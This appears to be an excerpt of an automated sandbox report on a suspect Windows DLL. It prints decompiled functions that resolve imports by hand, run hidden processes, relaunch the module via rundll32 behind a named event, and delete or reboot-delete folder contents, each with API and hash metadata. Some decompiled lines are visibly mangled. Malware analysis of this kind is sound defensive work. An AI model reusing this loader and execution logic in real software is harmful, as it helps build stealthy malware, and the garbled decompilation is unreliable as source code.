                                                                                                                        				void* _t83;
                                                                                                                        				signed short* _t88;
                                                                                                                        				void* _t94;
                                                                                                                        				signed short _t114;
                                                                                                                        
                                                                                                                        				_t83 = __edi;
                                                                                                                        				_t40 =  *((intOrPtr*)(__edi + 0xc0));
                                                                                                                        				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
                                                                                                                        					_t42 =  *((intOrPtr*)(_t67 + 0xc));
                                                                                                                        					_v8 = _t67;
                                                                                                                        					if(_t42 == 0) {
                                                                                                                        						L30:
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						_t94 = _v4;
                                                                                                                        						while(1) {
                                                                                                                        							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
                                                                                                                        							_v4 = _t44;
                                                                                                                        							if(_t44 == 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t46 =  *(_t83 + 0x154);
                                                                                                                        							if( *(_t83 + 0x150) < _t46) {
                                                                                                                        								L16:
                                                                                                                        								if(_t94 != 0) {
                                                                                                                        									_t53 =  *(_t83 + 0x150);
                                                                                                                        									_t54 = _t53 + 1;
                                                                                                                        									 *(_t83 + 0x150) = _t54;
                                                                                                                        									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
                                                                                                                        										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
                                                                                                                        										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t47 =  *((intOrPtr*)(_t83 + 0x144));
                                                                                                                        								_t78 = _v8;
                                                                                                                        								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
                                                                                                                        								_t70 = _t88;
                                                                                                                        								if( *((intOrPtr*)(_t78 + 4)) == 0) {
                                                                                                                        									L22:
                                                                                                                        									_t48 =  *_t70;
                                                                                                                        									_t114 = _t48;
                                                                                                                        									if(_t114 == 0) {
                                                                                                                        										L29:
                                                                                                                        										_t42 =  *((intOrPtr*)(_t78 + 0x20));
                                                                                                                        										_v8 = _t78 + 0x14;
                                                                                                                        										if(_t42 != 0) {
                                                                                                                        											_t67 = _v8;
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        											goto L30;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										L23:
                                                                                                                        										L23:
                                                                                                                        										if(_t114 >= 0) {
                                                                                                                        											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
                                                                                                                        										} else {
                                                                                                                        											_t49 = _t48 & 0x0000ffff;
                                                                                                                        										}
                                                                                                                        										_t51 = GetProcAddress(_v4, _t49);
                                                                                                                        										 *_t88 = _t51;
                                                                                                                        										if(_t51 == 0) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										_t48 = _t70[2];
                                                                                                                        										_t70 =  &(_t70[2]);
                                                                                                                        										_t88 =  &(_t88[2]);
                                                                                                                        										if(_t48 != 0) {
                                                                                                                        											goto L23;
                                                                                                                        										} else {
                                                                                                                        											_t78 = _v8;
                                                                                                                        											goto L29;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									_t75 =  *_t78;
                                                                                                                        									if(_t75 == 0) {
                                                                                                                        										return 8;
                                                                                                                        									} else {
                                                                                                                        										_t70 = _t75 + _t47;
                                                                                                                        										goto L22;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								if(_t46 == 0) {
                                                                                                                        									_t55 = 0x10;
                                                                                                                        								} else {
                                                                                                                        									_t55 = _t46 + _t46;
                                                                                                                        								}
                                                                                                                        								 *(_t83 + 0x154) = _t55;
                                                                                                                        								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
                                                                                                                        								if(_t94 == 0) {
                                                                                                                        									return 3;
                                                                                                                        								} else {
                                                                                                                        									_t59 =  *(_t83 + 0x150);
                                                                                                                        									if(_t59 != 0) {
                                                                                                                        										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
                                                                                                                        									}
                                                                                                                        									_t60 =  *(_t83 + 0x14c);
                                                                                                                        									if(_t60 != 0) {
                                                                                                                        										HeapFree(GetProcessHeap(), 0, _t60);
                                                                                                                        									}
                                                                                                                        									 *(_t83 + 0x14c) = _t94;
                                                                                                                        									goto L16;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							goto L35;
                                                                                                                        						}
                                                                                                                        						return 6;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L35:
                                                                                                                        			}



























                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction ID: ea0467e0b8c6b71df47d3204a102e90d60006ee14d2fb1e978779f0e02a6d6fc
                                                                                                                        • Opcode Fuzzy Hash: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction Fuzzy Hash: 02416076F007569BEB14EF68D8447A6B7A9FF44315F04862AE828CB341E735F814CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33175E(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
                                                                                                                        				intOrPtr _t34;
                                                                                                                        				struct HINSTANCE__* _t35;
                                                                                                                        				signed int _t37;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        				signed short _t39;
                                                                                                                        				CHAR* _t41;
                                                                                                                        				_Unknown_base(*)()* _t43;
                                                                                                                        				signed int _t45;
                                                                                                                        				signed int _t46;
                                                                                                                        				signed int _t47;
                                                                                                                        				signed int _t51;
                                                                                                                        				void* _t52;
                                                                                                                        				intOrPtr* _t57;
                                                                                                                        				signed short* _t59;
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				intOrPtr* _t68;
                                                                                                                        				void* _t73;
                                                                                                                        				signed short* _t76;
                                                                                                                        				void* _t81;
                                                                                                                        				signed short _t103;
                                                                                                                        
                                                                                                                        				_t73 = __edi;
                                                                                                                        				_t34 = __eax;
                                                                                                                        				while(1) {
                                                                                                                        					_t57 = _a12;
                                                                                                                        					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
                                                                                                                        					_a16 = _t35;
                                                                                                                        					if(_t35 == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t37 =  *(_t73 + 0x154);
                                                                                                                        					if( *(_t73 + 0x150) < _t37) {
                                                                                                                        						L13:
                                                                                                                        						if(_t81 != 0) {
                                                                                                                        							_t45 =  *(_t73 + 0x150);
                                                                                                                        							_t46 = _t45 + 1;
                                                                                                                        							 *(_t73 + 0x150) = _t46;
                                                                                                                        							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
                                                                                                                        								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
                                                                                                                        								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t38 =  *((intOrPtr*)(_t73 + 0x144));
                                                                                                                        						_t68 = _a12;
                                                                                                                        						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
                                                                                                                        						_t59 = _t76;
                                                                                                                        						if( *((intOrPtr*)(_t68 + 4)) == 0) {
                                                                                                                        							L19:
                                                                                                                        							_t39 =  *_t59;
                                                                                                                        							_t103 = _t39;
                                                                                                                        							if(_t103 == 0) {
                                                                                                                        								L26:
                                                                                                                        								_t34 =  *((intOrPtr*)(_t68 + 0x20));
                                                                                                                        								_a12 = _t68 + 0x14;
                                                                                                                        								if(_t34 != 0) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									return 0;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								L20:
                                                                                                                        								if(_t103 >= 0) {
                                                                                                                        									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
                                                                                                                        								} else {
                                                                                                                        									_t41 = _t39 & 0x0000ffff;
                                                                                                                        								}
                                                                                                                        								_t43 = GetProcAddress(_a16, _t41);
                                                                                                                        								 *_t76 = _t43;
                                                                                                                        								if(_t43 == 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_t39 = _t59[2];
                                                                                                                        								_t59 =  &(_t59[2]);
                                                                                                                        								_t76 =  &(_t76[2]);
                                                                                                                        								if(_t39 != 0) {
                                                                                                                        									goto L20;
                                                                                                                        								} else {
                                                                                                                        									_t68 = _a12;
                                                                                                                        									goto L26;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t65 =  *_t68;
                                                                                                                        							if(_t65 == 0) {
                                                                                                                        								return 8;
                                                                                                                        							} else {
                                                                                                                        								_t59 = _t65 + _t38;
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						if(_t37 == 0) {
                                                                                                                        							_t47 = 0x10;
                                                                                                                        						} else {
                                                                                                                        							_t47 = _t37 + _t37;
                                                                                                                        						}
                                                                                                                        						 *(_t73 + 0x154) = _t47;
                                                                                                                        						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
                                                                                                                        						if(_t81 == 0) {
                                                                                                                        							return 3;
                                                                                                                        						} else {
                                                                                                                        							_t51 =  *(_t73 + 0x150);
                                                                                                                        							if(_t51 != 0) {
                                                                                                                        								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
                                                                                                                        							}
                                                                                                                        							_t52 =  *(_t73 + 0x14c);
                                                                                                                        							if(_t52 != 0) {
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                        							}
                                                                                                                        							 *(_t73 + 0x14c) = _t81;
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L31:
                                                                                                                        				}
                                                                                                                        				return 6;
                                                                                                                        				goto L31;
                                                                                                                        			}
























                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction ID: d48dca3991ae4241c46d5425f78c2810b2c10174371ae7538861a01c2598590e
                                                                                                                        • Opcode Fuzzy Hash: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction Fuzzy Hash: E0315E76F007969BE704EF68D8447A6B7A9FF48355F048629E829CB301EB31F811CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F334230(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
                                                                                                                        				intOrPtr _v0;
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				struct _SHELLEXECUTEINFOA _v68;
                                                                                                                        				intOrPtr _t22;
                                                                                                                        				intOrPtr _t23;
                                                                                                                        				intOrPtr _t24;
                                                                                                                        				int _t25;
                                                                                                                        				DWORD* _t27;
                                                                                                                        				int _t35;
                                                                                                                        				signed int _t38;
                                                                                                                        				long _t40;
                                                                                                                        
                                                                                                                        				_push(0x3c);
                                                                                                                        				_push( &(_v68.hwnd));
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t22 = _v0;
                                                                                                                        				_v68.cbSize = 0x3c;
                                                                                                                        				_v68.fMask = 0x800400;
                                                                                                                        				_v68.nShow = 0;
                                                                                                                        				if(_t22 != 0) {
                                                                                                                        					_v68.lpFile = _t22;
                                                                                                                        				}
                                                                                                                        				_t23 = _a4;
                                                                                                                        				if(_t23 != 0) {
                                                                                                                        					_v68.lpParameters = _t23;
                                                                                                                        				}
                                                                                                                        				_t24 = _v4;
                                                                                                                        				if(_t24 != 0) {
                                                                                                                        					_v68.lpVerb = _t24;
                                                                                                                        				}
                                                                                                                        				if(_a8 == 0) {
                                                                                                                        					_v68.fMask = 0x808400;
                                                                                                                        				} else {
                                                                                                                        					_v68.nShow = 1;
                                                                                                                        				}
                                                                                                                        				_t38 = _a12;
                                                                                                                        				if(_t38 != 0) {
                                                                                                                        					_v68.fMask = _v68.fMask | 0x00000040;
                                                                                                                        				}
                                                                                                                        				_t25 = ShellExecuteExA( &_v68);
                                                                                                                        				_t35 = _t25;
                                                                                                                        				if(_t35 != 0 && _t38 != 0) {
                                                                                                                        					if(_t38 == 0xffffffff) {
                                                                                                                        						_t40 = _t38 | 0xffffffff;
                                                                                                                        					} else {
                                                                                                                        						_t40 = _t38 * 0x3e8;
                                                                                                                        					}
                                                                                                                        					WaitForSingleObject(_v68.hIcon, _t40);
                                                                                                                        					_t27 = _a12;
                                                                                                                        					if(_t27 != 0) {
                                                                                                                        						GetExitCodeProcess(_v68.hIcon, _t27);
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v68.hIcon);
                                                                                                                        					_t25 = _t35;
                                                                                                                        				}
                                                                                                                        				return _t25;
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1639083440-2766056989
                                                                                                                        • Opcode ID: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction ID: 9fd273de62ff93ce936e8f54bf83aa43079eeafee47608e2d9efb4b00d4676af
                                                                                                                        • Opcode Fuzzy Hash: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction Fuzzy Hash: AC216F729097A19BD710CF69C544B5BBBE8BB89710F008A1EF9A4E3280D777D804CF52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F335190(intOrPtr _a4) {
                                                                                                                        				char _v772;
                                                                                                                        				char _v780;
                                                                                                                        				void* _t4;
                                                                                                                        				char* _t5;
                                                                                                                        				char _t6;
                                                                                                                        				intOrPtr _t11;
                                                                                                                        				CHAR* _t14;
                                                                                                                        
                                                                                                                        				_t11 = _a4;
                                                                                                                        				if(_t11 != 0x65 ||  *0x6f34027c >= 6 && M6F340544 == 0 && M6F340548 != 0) {
                                                                                                                        					_t4 = OpenEventA(2, 0, "TVRF_Instance");
                                                                                                                        					if(_t4 == 0) {
                                                                                                                        						_t5 = M6F340530; // 0x997378
                                                                                                                        						_t14 = M6F340524; // 0x9954b0
                                                                                                                        						_t6 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        						wsprintfA( &_v780, "\"%s%s\" \"%s\",#%d %c \"%s\"", _t6, "rundll32.exe", _t14, 0x195, _t11, _t5);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						return E6F334EF0( &_v772, 1, 0);
                                                                                                                        					} else {
                                                                                                                        						CloseHandle(_t4);
                                                                                                                        						goto L6;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					L6:
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,TVRF_Instance), ref: 6F3351C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3351D2
                                                                                                                        • wsprintfA.USER32 ref: 6F33520D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandleOpenwsprintf
                                                                                                                        • String ID: "%s%s" "%s",#%d %c "%s"$TVRF_Instance$rundll32.exe
                                                                                                                        • API String ID: 3063877008-2939335533
                                                                                                                        • Opcode ID: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction ID: 6cbb97e43f4a80142bbc268f1e261c37de654f333b52529154985c0ec639c8af
                                                                                                                        • Opcode Fuzzy Hash: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction Fuzzy Hash: 1601F2B2E94791ABEF60E724CC55BA237AEE755725F40120CF824851D0E679A168CB22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332E59(struct _WIN32_FIND_DATAA _a16, char _a60, char _a336, char _a344) {
                                                                                                                        				signed char _t9;
                                                                                                                        				CHAR* _t16;
                                                                                                                        				void* _t18;
                                                                                                                        				void* _t23;
                                                                                                                        				void* _t28;
                                                                                                                        
                                                                                                                        				do {
                                                                                                                        					_t9 = _a16.dwFileAttributes;
                                                                                                                        					if((_t9 & 0x00000010) == 0 && _t9 != 0) {
                                                                                                                        						wsprintfA( &_a336, "%s%s", _t18,  &_a60);
                                                                                                                        						_t28 = _t28 + 0x10;
                                                                                                                        						_t16 = DeleteFileA( &_a344);
                                                                                                                        						if(_t16 == 0) {
                                                                                                                        							MoveFileExA( &_a344, _t16, 4);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} while (FindNextFileA(_t23,  &_a16) != 0);
                                                                                                                        				FindClose(_t23);
                                                                                                                        				return 1;
                                                                                                                        			}


                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDeleteMoveNextwsprintf
                                                                                                                        • String ID: %s%s
                                                                                                                        • API String ID: 2350977733-3252725368
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 38%
                                                                                                                        			E6F334A20() {
                                                                                                                        				char _v4;
                                                                                                                        				char _v12;
                                                                                                                        				char _v16;
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				intOrPtr* _v36;
                                                                                                                        				char _v40;
                                                                                                                        				char _v44;
                                                                                                                        				intOrPtr* _v48;
                                                                                                                        				char _v52;
                                                                                                                        				intOrPtr* _v56;
                                                                                                                        				intOrPtr* _v60;
                                                                                                                        				intOrPtr _v64;
                                                                                                                        				intOrPtr* _v68;
                                                                                                                        				char _v72;
                                                                                                                        				intOrPtr* _v76;
                                                                                                                        				char _v80;
                                                                                                                        				intOrPtr* _v84;
                                                                                                                        				char _v88;
                                                                                                                        				intOrPtr* _v100;
                                                                                                                        				char _v104;
                                                                                                                        				intOrPtr* _v108;
                                                                                                                        				intOrPtr* _v124;
                                                                                                                        				intOrPtr _v128;
                                                                                                                        				intOrPtr* _v132;
                                                                                                                        				intOrPtr* _v136;
                                                                                                                        				intOrPtr _v140;
                                                                                                                        				intOrPtr* _v148;
                                                                                                                        				intOrPtr* _t67;
                                                                                                                        				intOrPtr* _t70;
                                                                                                                        				intOrPtr* _t73;
                                                                                                                        				intOrPtr* _t76;
                                                                                                                        				intOrPtr* _t78;
                                                                                                                        				intOrPtr* _t81;
                                                                                                                        				intOrPtr* _t84;
                                                                                                                        				intOrPtr* _t87;
                                                                                                                        				intOrPtr* _t89;
                                                                                                                        				intOrPtr* _t94;
                                                                                                                        				intOrPtr* _t97;
                                                                                                                        				intOrPtr* _t99;
                                                                                                                        				intOrPtr* _t102;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				intOrPtr* _t106;
                                                                                                                        				intOrPtr* _t108;
                                                                                                                        				intOrPtr* _t111;
                                                                                                                        				void* _t150;
                                                                                                                        				void* _t151;
                                                                                                                        				void* _t153;
                                                                                                                        				intOrPtr* _t154;
                                                                                                                        				void* _t156;
                                                                                                                        				intOrPtr _t157;
                                                                                                                        				intOrPtr* _t158;
                                                                                                                        
                                                                                                                        				_t158 = __imp__CoCreateInstance;
                                                                                                                        				_push( &_v16);
                                                                                                                        				_push(0x6f33e08c);
                                                                                                                        				_push(1);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0x6f33e0cc);
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v4 = 0;
                                                                                                                        				_v16 = 0;
                                                                                                                        				if( *_t158() < 0) {
                                                                                                                        					L26:
                                                                                                                        					return _v32;
                                                                                                                        				}
                                                                                                                        				_t67 = _v36;
                                                                                                                        				_v40 = 0;
                                                                                                                        				_push( &_v40);
                                                                                                                        				_push(_t67);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
                                                                                                                        					L25:
                                                                                                                        					_t70 = _v44;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
                                                                                                                        					if(_v36 != 0) {
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        					goto L26;
                                                                                                                        				}
                                                                                                                        				_t73 = _v48;
                                                                                                                        				_v52 = 0;
                                                                                                                        				_push( &_v52);
                                                                                                                        				_push(_t73);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
                                                                                                                        					L24:
                                                                                                                        					_t76 = _v56;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
                                                                                                                        					goto L25;
                                                                                                                        				} else {
                                                                                                                        					_t78 = _v60;
                                                                                                                        					_v44 = 0;
                                                                                                                        					_push( &_v44);
                                                                                                                        					_push(_t78);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
                                                                                                                        						_v48 = 1;
                                                                                                                        					}
                                                                                                                        					_t81 = _v68;
                                                                                                                        					_v72 = 0;
                                                                                                                        					_push( &_v72);
                                                                                                                        					_push(_t81);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
                                                                                                                        						L23:
                                                                                                                        						_t84 = _v76;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
                                                                                                                        						goto L24;
                                                                                                                        					}
                                                                                                                        					_t154 = __imp__#2;
                                                                                                                        					_t151 =  *_t154(_v44, _t150, _t153);
                                                                                                                        					if(_t151 == 0) {
                                                                                                                        						L22:
                                                                                                                        						_t87 = _v84;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
                                                                                                                        						goto L23;
                                                                                                                        					}
                                                                                                                        					_t89 = _v84;
                                                                                                                        					_push( &_v88);
                                                                                                                        					_v88 = 0;
                                                                                                                        					_push(_t151);
                                                                                                                        					_push(_t89);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
                                                                                                                        						if(_v64 != 0) {
                                                                                                                        							_t156 =  *_t154(_v56);
                                                                                                                        							if(_t156 != 0) {
                                                                                                                        								_push( &_v104);
                                                                                                                        								_push(0x6f33e05c);
                                                                                                                        								_push(1);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0x6f33e0ac);
                                                                                                                        								if( *_t158() >= 0) {
                                                                                                                        									_t94 = _v124;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
                                                                                                                        									_t97 = _v132;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
                                                                                                                        									_t99 = _v136;
                                                                                                                        									_push(_v140);
                                                                                                                        									_push(_t99);
                                                                                                                        									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
                                                                                                                        										_v128 = 1;
                                                                                                                        									}
                                                                                                                        									_t102 = _v148;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
                                                                                                                        								}
                                                                                                                        								__imp__#6(_t156);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L21:
                                                                                                                        						__imp__#6(_t151);
